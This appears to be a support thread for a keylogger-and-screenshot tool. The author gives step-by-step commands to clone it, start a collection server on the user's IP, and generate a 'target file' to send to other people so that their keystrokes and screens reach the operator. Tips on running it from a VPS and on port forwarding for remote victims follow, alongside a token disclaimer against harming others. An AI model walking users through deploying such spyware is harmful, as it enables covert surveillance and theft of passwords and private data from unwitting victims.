I need help
I need help learning how to use it please explain
First of all you will have to clone the project by typing
git clone https://github.com/Kill0geR/KeyloggerScreenshot.git
in your terminal.
Go into the program’s folder You type:
cd KeyloggerScreenshot
Install what it needs You type:
python requirements.py
Tell the program where to send the info You type something like:
python KLS_start.py -aip 127.0.0.1 -cf
Change 127.0.0.1 to your ip-address for example (192.168.0.10). You will find the ip address by typing: ipconfig on windows and ifconfig or ip a on linux
-cf creates a target file which you can send to others. They can know run the script and will be connected with the server
NOTE
If you send the created script to others your terminal where python KLS_start.py -aip 127.0.0.1 -cf should still be running. If you want to run it later you must include "-ds" in your terminal. This creates a server that is connected with the target file.
This only works internally when you want to use your own computer. The true power unfolds if you run KeyloggerScreenshot on a vps server.
PLEASE DO NOT USE KeyloggerScreenshot TO HARM OTHERS
Hope this helps
Like my public ip or private, also what does git clone do?
Also when I run the KLS_start it says "invalid sequence 29 " something like that
You should use your private ip. If you want to use your public ip you have to install port forwarding on your home router
Also when I run the KLS_start it says "invalid sequence 29 " something like that
Can you send me an image of the error
i cant send a photo but it has something to do with the \ maybe you did the gui wrong
Did you fix it?
Tbh I still haven't found the issue. It works on all machines that I have tried.